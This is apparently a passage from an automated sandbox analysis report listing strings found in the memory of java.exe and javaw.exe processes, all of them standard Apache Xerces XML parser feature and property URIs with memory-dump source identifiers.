        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformantom2
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotations
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotationsTextI;
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
        Source: java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesl
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesre1
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamic
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/sun/F
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/id-idref-checkingl
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checking
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkinges
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingin=
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psviint
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl/A
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclA
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
        Source: javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valuenternalB
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingn/org/B
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef/xni/XD
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefD
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef:
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefm/su:
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/xerce
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-languager
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude1
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/D
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-size
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-sizejava/l
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory:
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryes/i:
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scannerP
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scannerypeDef7
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processort5
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerdAt8
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver6
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-bindery
